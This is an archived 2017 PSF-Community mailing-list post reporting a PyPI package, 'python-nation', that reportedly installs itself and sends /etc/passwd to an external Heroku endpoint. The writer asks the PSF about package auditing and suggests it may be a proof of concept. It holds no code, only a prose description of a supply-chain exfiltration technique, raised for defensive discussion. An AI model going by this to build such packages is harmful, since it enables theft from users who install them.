[PSF-Community] Dangerous PyPI packages and PSF
Bruno Rocha
rochacbruno at gmail.com
Thu May 4 20:08:15 EDT 2017
Interesting detail, the mentioned package
https://pypi.python.org/pypi/python-nation/1.0.1 was created and uploaded
by Jacob Kaplan Moss, so I guess this is intended to be a POC, to show PyPI
vulnerabilities or some Infosec experiment.
On Thu, May 4, 2017 at 8:41 PM, Bruno Rocha <rochacbruno at gmail.com> wrote:
> Hi,
>
> I just read this on reddit[0], a thread asking if PyPI packages are
> audited and somebody pointed the `python-nation`[1] which is a harmful and
> useless module, installing itself and sending the `/etc/passwd` content to
> external endpoint.
>
> The app receiving the data is hosted at http://python-nation.herokuapp.com
>
> and as the PSF mission [2] says
>
> The mission of the Python Software Foundation is to promote, protect, and
> advance the Python programming language
>
> I wonder if there are some workgroup at PSF to handle this? and not only
> the specific case of `python-nation` which should be deleted and the user
> banned maybe, But also to handle the audit of other packages?
>
>
> [0] https://www.reddit.com/r/Python/comments/697da2/does_pyp
> i_review_code_thats_uploaded/
> [1] https://www.reddit.com/r/Python/comments/697da2/does_pyp
> i_review_code_thats_uploaded/dh4uyf8/
> [2] https://www.python.org/psf/mission/
>
>
> Cheers,
>
> --
>
> *Bruno Rocha - @rochacbruno <http://twitter.com/rochacbruno>*
> http://brunorocha.org
>
>
--
*Bruno Rocha - @rochacbruno <http://twitter.com/rochacbruno>*
http://brunorocha.org
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/psf-community/attachments/20170504/7a1bb3b9/attachment.html>
More information about the PSF-Community
mailing list